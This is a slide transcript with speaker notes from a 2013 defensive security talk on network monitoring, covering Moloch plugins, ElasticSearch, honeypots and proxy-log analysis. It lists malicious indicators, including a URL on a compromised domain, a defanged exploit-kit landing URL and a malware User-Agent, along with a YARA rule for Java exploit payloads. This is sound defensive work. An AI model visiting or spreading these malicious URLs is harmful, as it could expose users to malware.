  • 78. Or Even Wiki page ● benefaction.ru.heaven774.blogdns.com 54.217.234.176 http://benefaction.ru.heaven774.blogdns.com/ ?in=55530 ● Tue, 08 Oct 2013 12:15:03 GMT ● Blogs/Wiki
  • 79. Reputation filters won't help here ● On available Environments less than 10% of malicious resources categorized as malicious bu vendor supplied reputation filters during October 2013
  • 80. Reputation filters won't help here URL on the same site: alldistributors.ru/image/ Site: alldistributors.ru 81
  • 81. Yep, they are all legit!
  • 82. Some of them older than 10 years ● ● Over 500 compromised domains in 24 hours Domain rotation once per minute (3 minutes in the other incident)
  • 83. What do you know about more sophisticated bots?
  • 84. Proliferation of malware that uses blogging/social networks as c2 Explore header anomaly GET / …. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Connection: Cache-Control: Pragma:
  • 85. 88 Elirks: v01  Reported by Dell/Secureworks as Elirks http://www.secureworks.com/cyber-threatintelligence/threats/chasing_apt/
  • 87. 90 Campaigns can be linked by the same IP sources to access web Managed by the same IP addresses (easy to cross-correlate)
  • 88. Ready to catch them?
  • 89. Scalable Tools for Advanced Network Monitoring Discover malware operations with your bare hands V. Kropotov; F. Yarochkin
  • 90. Gaand de Dhakkan FOR YOUR NETWORK :)
  • 91. Agenda The battle field: network traff 0.5% of your traffic is what you really want.. now what..? Off-shelf tools and their problems Automation of manual work. Alot of automation Examples and Case studies Conclusions
  • 92. Disclaimer We'll mainly talk about our experience with scalable network monitoring. Some of the tools we are about to mention, we have developed ourselves. Other tools are done by other great guys and we are heavy users of those.
  • 93. Monitoring VS Protection ● Strange, but true Efficiency(Monitoring)~O(1/ Efficiency(Protection))
  • 94. Passive detection VS Active protection ● False positives for these methods ● The cost of the time lag with passive detection ● The cost of DoS from Active protection
  • 95. Incident Mitigation VS Investigation ● If your preparation is not enough Efficiency(Mitigation)~ O(1/ Efficiency(Investigation)) ● If you prepared, almost all steps of Investigation you can do asynchronously
  • 96. Not typical approaches ● ● ● Snapshotting DNS Analysis and traffic Redirection (Internal sinkholing) Sandboxing
  • 97. Systematic Defense ● ● ● What to look at How to look at your data Rinse and repeat ;-) How to prepare well for an attack (you can't walk into the same river twice, so 'preserve' the flow) 100
  • 98. Old skool network analysis :) Snort is handy ● Single node ● Patterns specified in rule files ● You get notified when alert occurs ● You can specify some auto-reactive rules to act real-time
  • 99. What's missing ● ● ● ability to capture from multiple nodes and merge the results (me → snortnet, 1999 :p) Your snort (or any other IDS) will miss stuff that is not in signatures, now what .. Running experimental analytics, FP analysis on IDS results is very difficult because there is no 'raw data'
  • 101. Now made possible.. We need a more than one node to store data We need some sort of data management plan And .. A convenient way of finding things.. quick!
  • 102. ElasticSearch ● really awesome, all my data lives here ;)
  • 103. ES ● ● Multiple Indices, easy cross-correlation, data HA, Lucene-based search capability Design your data flow smartly (simple things: indices are fast to remove, individual items – are not, store metadata, keep raw data where it was captured)
  • 104. So what we store ● Our feeds into ES: – Honeypot logs – Network monitoring with eyeipflow scriptlets – Network data from Moloch – DNS traff analysis – User-Agent/IP/time maps
  • 105. What to look at.... ● ● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc) Time-series traffic analysis Emerging Threats has a large number of APT related sigs. Take-and-modify :)
  • 106. Not only payload used as transition (covert channel in URL) ● GET hxxp://lionsholders.biz/st.php? os=windows %207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe %20flash=11.7.700.169&windows%20media %20player=12.0.7601.17514&java=0&silverli ght=0
  • 107. Honeypots ● Service-simulation honeypots. Collect plenty tracers on random network opportunists. – Ex: kippo (modified to keep trace-log in ES):
  • 108. Nice collection of Romanian tools over the years ;-)
  • 109. eyeipflow ● ● ● Libwireshark + python + yara. Capable of processing pcap files that you collect elsewhere. Libsniff-ng is good for high-volume traff Store meta-data on various protocol transactions: HTTP, SMTP, DNS ..
  • 110. And then we discovered Moloch :)
  • 111. Moloch Uses libnids for packet reassembly Multi-protocol Supports yara Actively developed Supports plugin architecture Custom taggers are extremely useful
  • 112. Moloch with plugins (on DRUGS!) Moloch is developed by a team at AOL and released open-source at http://github.com/aol/moloch/
  • 114. Introduction to writing moloch plugins ● moloch_plugin_init() { moloch_plugin_register(“leet”, FALSE); /* register callbacks */ moloch_plugin_set_cb(“leet”, A, B, C, D, E, F, H, I } /* the rest of your init stuff */ }
  • 115. Moloch plugins (pt 2) ● Callbacks: – A) MolochPluginIpFunc ipFunc, – B) MolochPluginUdpFunc udpFunc, – C) MolochPluginTcpFunc tcpFunc, – D) MolochPluginSaveFunc preSaveFunc, – E) MolochPluginSaveFunc saveFunc, – F) MolochPluginNewFunc newFunc, – G) MolochPluginExitFunc – H) MolochPluginReloadFunc reloadFunc exitFunc,
  • 117. Redundancy Properties in the malware distribution and postinfection activities campaigns
  • 118. Passive DNS data is used to identify DGA malware C2 servers
  • 119. Passive HTTP monitoring and anomaly detection Wavelet-based analysis
  • 120. Proxy logs at glance example 129
  • 122. User-agent request example, Why legit Win8 is here? 131
  • 123. Silent Debugging?? Host, OS, more than other 20 params.. ● Local host name HMS0277 X-Client/AppexWin8 X-Client-AppVersion/1.2.0.135 09.08.2013 8:13 131.253.40.10 80 GET ● http://g.bing.net/8SE/201? MI=FED21F3944A344D38E5C61C00AC78AC3&AP=3&LV=1.2 .0.135&OS=W8&TE=1&TV=ts20130613214629143%7Ctz240%7Ctmru-ru %7Ctc1%7Cdr8%252C0%7Caa1058%252F1%252C0%252F0 %7CdaHMS0277%7CorRU %7Cwa1%7Cde4%7Cad1%252C0%7Ccd9%252C0%7Cdd0% 7Ctp20130505%7Cccrow %7Cdc1%7Cpd1%252C0%7Cto4%7Clc1%252C0%252C0%25 2C0%7Cdb1 132
  • 125. Proxy logs processing The ideas see the code example in our git https://github.com/fygrave/ndf 1. Take predefined patterns for log fields and calculate log line score. Depending on score write down line into colored (EB,B,W,EW,Gr) list for further investigation (--list) 2. Find all lines with field matched specified pattern – smth. like egrep+cutawk (--match) 134
  • 126. General course of work (list search) 135
  • 127. General course of work (match search) 136
  • 128. The scenario 1. --list ==> Scored rows with signatures ==> Users in troubles 2. --match ==> Find all history about users in troubles – before and after signature ==> Further manual investigation 3. Update signatures if need to 137
  • 129. Yara - based Easy to integrate with your scripts Integration with a proxy server is possible via icap yara plugin: https://github.com/fygrave/c_icap_yara (inline analysis) Raw network traffic monitoring project (and http/DNS indexing): https://github.com/fygrave/eyepkflow (passive HTTP)
  • 130. Detecting typical fields inside payload ● For example (YARA): Rule SploitMatcher { strings: $match01 = "com.class'" $match02 = "edu.class" $match03 = "net.class" $match04 = “security.class” condition: all of them } Problem: you can't deobfuscate javascript with Yara. But you can block the payload, Which would be fetched by the javascript, thus break the exploitation chain. 139
  • 131. Or you can roll your own.. personal crawler with yara and jsonunpack :) see the code example in our git https://github.com/fygrave/ndf 140
  • 132. Other cool YARA tools Moloch https://github.com/aol/moloch Yara mail https:// github.com/kevthehermit/yaraMail Yara pcap https:// github.com/kevthehermit/YaraPcap
  • 133. What we will see in 2014 ● ● ● ● ● Android based platforms would be one of the primary targets Vendor supplied reputation filters won't be so effective, due the compromised legit domains pool size Commercially oriented cyber criminals will use non standard ports, abused hosting, DNS servers and short time frames as now in Russia. Cyber criminals will act outside the country of their residence (it's better for Russia, but only for Russia...) Defenders will use more and more own signatures, rules, tools and pills to survive.
  • 134. Forecast for 2014: Roll your own.. To survive in this dangerous environment. 143
  • 135. Conclusion We've seen interesting techniques We've seen that the 'low-hanging fruit' is not so low anymore :)
  • 136. Now it is the time for questions And throwing your shoes ;-)
  • 138. Tools  Developed by our lab: − − DNSLyzer http://gtihub.com/fygrave/dnslyzer −  Eyepkflow http://github.com/fygrave/eyepkflow HPFeeds Broker – no public release 3rd party tools we use: − Redis, ElasticSearch, Moloch, Hpfeeds library, RabbitMQ, zmap
  • 139. Data Acquisition options - We have a software agent (unix(freeBSD, linux, Solaris) platform compatible) - We can process pcap files. - We can deploy processing platform at your facility (we need remote access) - We have a collector device (1Gb network interface)

Editor's Notes

  • #21: Here we see CP EP message that Worm.Win32.Vobfus.djek was found. In fact it&apos;s false positive: CP deleted component of SAP GUI that lead to problems with export to excel for some SAP users. It should be noted that FP happens not so often as false negatives (FN), but usually they are much more visible because interrupt company&apos;s normal operations. Couple years ago we have a really big problem with gas stations. In that issue McAfee decided that component of gas station automation system is malware – the operation of several hundreds gas stations was halted till we investigate what was going on and fix this issue. That case lead us to the need to test all anti-virus updates before deployment. Of course we had to do this cost-effectively, so we were not able to deploy anti-virus updates more often then once a week. If you remember we have thousands of malware strains a day, so weekly updates have nothing with security.
  • #22: Antivirus could be however used as an efficient fuck up indicatior. By this you can see how much you missed last year. :)
  • #65: Here we have another example: CP Anti-bot (let&apos;s think about this as IDS) decided that user that is buying plane tickets from Aeroflot is in botnet and Aeroflot official site is it&apos;s C&amp;C
  • #66: Here we have another example: CP Anti-bot (let&apos;s think about this as IDS) decided that user that is buying plane tickets from Aeroflot is in botnet and Aeroflot official site is it&apos;s C&amp;C
  • #89: &lt;number&gt;
  • #90: &lt;number&gt;
  • #91: &lt;number&gt;
  • #101: Systematic approach is essential. The specifics of network traffic is, if you don&apos;t preserve any evidence at the time when the incident takes place, you&apos;ll have nothing to look at later.